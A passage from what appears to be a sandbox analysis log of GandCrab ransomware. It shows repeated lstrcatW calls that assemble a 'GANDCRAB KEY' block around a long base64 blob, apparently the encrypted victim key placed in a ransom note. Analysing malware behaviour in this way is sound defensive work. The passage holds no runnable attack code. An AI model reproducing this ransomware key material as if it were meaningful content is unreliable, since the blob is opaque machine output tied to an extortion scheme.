KEY---\r\n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\r\n", lpString2="---END GANDCRAB KEY---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---" [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n") returned="---BEGIN GANDCRAB KEY---\r\nlAQAABBjXthJ5Q0wPDOiR/UUqBjqNGGRMSETfnKFN/wC0Z2y8uXNK/cQRxQ+uxjvHYoRNWKOwypfSnwisazfo2Iu5vWW+RCkGGB1GnesQkQwuT2AZxVx5QY4ie+leW/MZAwGPpz8/7dZwoL+UqqOwMpTG3+AnvEQ3LMnIiQcp4HDfd38MPRCsR6gqcIHoBpULwC3Gm7xztZBiHGZgZV7LnagQkrOAlwT16ipqL1zXT4kOyGEZLSlq6HRWrRJkYSQ5zLtP1Tk4hmmBQ1fojWFrcoT46xcvW+3S30nV0FCQYdj5hHfbPlbORZri4n+eUCIlF1tKxbEiQtJNtfft1vkY1bnxIdtEtWbINwlun/197gOrrIXJ+Ep7a1s4hAT2kEkm1HUN99FUMz+IsQEK5ADYm5JsBUacYlXRewwxNAUgkwTQ1ixWHch6LNfoFbx/Y0QglYGl76bLgljglPiar+FMmsJkHDxXFAdpVPMKT+Ppcn2g1ReomyZsAw30hNMyYCtyzYVmQzNVVwevMkpq3Dfv0vHeCjXc0qgr8HSxoWSlVBzULrGdwqzabYyorx2wb2lPqnCsL/YOtcriePbwsWYFZQGFc1JoqJJZ5JttJ51ELDRCNMDhtZvBfaIze9TZLRaCBi0MJhTW08tcfTobJvJ0M94VbQDv+NQ7nkxi5S38g2FrM8HufqqI4ZgLoqCtEZDgibtBwQzmw0U+d/fimMNWfwOU5e6wPNjPHZjsW8/4Hf0fgXAvB2+gkvRsuHSiuWS0Zxz/AB3NiGOdZPdxrqKqYIBOkK5GH6n91Qit/CfFfNChQYysYHiEU1mCJ/F/BmeJy7tA0UrbroLSfEtzSxc6NsTHAeemHnNw8mLVApRnhPB6s6iZfYkboDLE7drVDlRrfzboc1VnGvFfFBf+Z7k+WUvkkhcACZiKtlPbp54S/s+UsmNHjUNR6DxSI21uaEP2M0quWSeFJ8wva+n/lG5XuLxKMYSDHOa9ys41HiQzC3A3Rgs/xXOtfM1xkVMelZx9dglof34J4GaoE7Sd4uA2kyaLvWbDChU8ZFHH+LOCfVAZaH4UnBeHc7hp6CSj0Kws1h01FcXgtvjCnApjU7FrYSBCrwzSsXOUk6AC47AiViH/qEfB4Dsf3rNY8JDbQTDrsWzI9obqNSOFe/JOsdNNVlx9gQ1yWY8Ne3Q3vqb2aNglg5+mnfrOPbQJ3f6SHyRSchoDrJfz8Cixu9Sk98DYWfjnspu5Yd/PxGD2UObk0bheMxhRisBc9BczSOL+6tlebhBmTh8LFaVomK1S8uztshRVcOJhp7o+HV5dQT5wALSyL6gNRGnOj54XQ6u56H/pjc+TKlY0aWRv8vecYDRDHLUnEHABLFqJP6Xyd1HSW26KetjV7KnBIh9FZhgkadhqOWuUgfoSobr2aM7YOjgZRhDinYb1sTIIwbmcdoUEEbjLPz35/pDb3rK/jeSbCapCh3zCffHr1h9XYWL7oglK1Iy9SnPzrNtw5inn5gF/Tb22/dx4+2SaUHPxTypOykbfjrWzNyN4t8TpJmjdvm1Al8STSQsvvRU7ECaR7nL2AdBN6J2m5jmdxTZydwJPn61cpF9kqDw/tvLOLJCCzV2ZDH3OImVuing1l1ebceBSEjo6Ra6zgu1Mj2cX9WMw1Px0Sd2lMuwmQk406OIdLdUd4glqf0UHr8dfGJyfbaJELctV6g6+n5fDq6VQA0rxxtyvkCthmRLsTgfOoXe4G7h9iNuesoMr0Poa8kJZTVhf3wT/uuydMyUpclSIjq+fUIRr+7k/W9O9Vsy2Ncx5pf+S+MrL1Am5RQi3c6xFeTx3McZR80nVinhuYliRQhKNoNWI2gHaG6lRuz+QhG0RpMYbzBgOj5hi/ccyUyhM5fUIgcJ19lPdcmvixGlk5R8rk2ZfxhJxrFIuLQTsRraiwcDMTAm9c8kdr/Yf4Qn+bv7yJZ4YXgB8Edl1XdSnMrUPV5orcBx32esHl1bFHkes9Z9fwjFFx5B/Cryn6I0bTh6SxqxSMKfawlYjWRyp5yXtNibb+czxTwg05WEViDj2ZM5VFE5g9jVx1zLgL6rEoxvbP3/oWsr3rr58cqbE6IIH4k3tt4u7iqzfUkJmH+81vZbVzYHc6HQL/VLmt+Y7hRk6yorSj1pmiPFrXL99WrblAY6Nqyh2mx/jKDXMZzdlUQ2M5gjVl86lNCo37LDLVHUJd8suA7xHavGKMBzzx85p+J/UV9WPXnruEA=\r\n---END GANDCRAB KEY---\r\n" [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAABBjXthJ5Q0wPDOiR/UUqBjqNGGRMSETfnKFN/wC0Z2y8uXNK/cQRxQ+uxjvHYoRNWKOwypfSnwisazfo2Iu5vWW+RCkGGB1GnesQkQwuT2AZxVx5QY4ie+leW/MZAwGPpz8/7dZwoL+UqqOwMpTG3+AnvEQ3LMnIiQcp4HDfd38MPRCsR6gqcIHoBpULwC3Gm7xztZBiHGZgZV7LnagQkrOAlwT16ipqL1zXT4kOyGEZLSlq6HRWrRJkYSQ5zLtP1Tk4hmmBQ1fojWFrcoT46xcvW+3S30nV0FCQYdj5hHfbPlbORZri4n+eUCIlF1tKxbEiQtJNtfft1vkY1bnxIdtEtWbINwlun/197gOrrIXJ+Ep7a1s4hAT2kEkm1HUN99FUMz+IsQEK5ADYm5JsBUacYlXRewwxNAUgkwTQ1ixWHch6LNfoFbx/Y0QglYGl76bLgljglPiar+FMmsJkHDxXFAdpVPMKT+Ppcn2g1ReomyZsAw30hNMyYCtyzYVmQzNVVwevMkpq3Dfv0vHeCjXc0qgr8HSxoWSlVBzULrGdwqzabYyorx2wb2lPqnCsL/YOtcriePbwsWYFZQGFc1JoqJJZ5JttJ51ELDRCNMDhtZvBfaIze9TZLRaCBi0MJhTW08tcfTobJvJ0M94VbQDv+NQ7nkxi5S38g2FrM8HufqqI4ZgLoqCtEZDgibtBwQzmw0U+d/fimMNWfwOU5e6wPNjPHZjsW8/4Hf0fgXAvB2+gkvRsuHSiuWS0Zxz/AB3NiGOdZPdxrqKqYIBOkK5GH6n91Qit/CfFfNChQYysYHiEU1mCJ/F/BmeJy7tA0UrbroLSfEtzSxc6NsTHAeemHnNw8mLVApRnhPB6s6iZfYkboDLE7drVDlRrfzboc1VnGvFfFBf+Z7k+WUvkkhcACZiKtlPbp54S/s+UsmNHjUNR6DxSI21uaEP2M0quWSeFJ8wva+n/lG5XuLxKMYSDHOa9ys41HiQzC3A3Rgs/xXOtfM1xkVMelZx9dglof34J4GaoE7Sd4uA2kyaLvWbDChU8ZFHH+LOCfVAZaH4UnBeHc7hp6CSj0Kws1h01FcXgtvjCnApjU7FrYSBCrwzSsXOUk6AC47AiViH/qEfB4Dsf3rNY8JDbQTDrsWzI9obqNSOFe/JOsdNNVlx9gQ1yWY8Ne3Q3vqb2aNglg5+mnfrOPbQJ3f6SHyRSchoDrJfz8Cixu9Sk98DYWfjnspu5Yd/PxGD2UObk0bheMxhRisBc9BczSOL+6tlebhBmTh8LFaVomK1S8uztshRVcOJhp7o+HV5dQT5wALSyL6gNRGnOj54XQ6u56H/pjc+TKlY0aWRv8vecYDRDHLUnEHABLFqJP6Xyd1HSW26KetjV7KnBIh9FZhgkadhqOWuUgfoSobr2aM7YOjgZRhDinYb1sTIIwbmcdoUEEbjLPz35/pDb3rK/jeSbCapCh3zCffHr1h9XYWL7oglK1Iy9SnPzrNtw5inn5gF/Tb22/dx4+2SaUHPxTypOykbfjrWzNyN4t8TpJmjdvm1Al8STSQsvvRU7ECaR7nL2AdBN6J2m5jmdxTZydwJPn61cpF9kqDw/tvLOLJCCzV2ZDH3OImVuing1l1ebceBSEjo6Ra6zgu1Mj2cX9WMw1Px0Sd2lMuwmQk406OIdLdUd4glqf0UHr8dfGJyfbaJELctV6g6+n5fDq6VQA0rxxtyvkCthmRLsTgfOoXe4G7h9iNuesoMr0Poa8kJZTVhf3wT/uuydMyUpclSIjq+f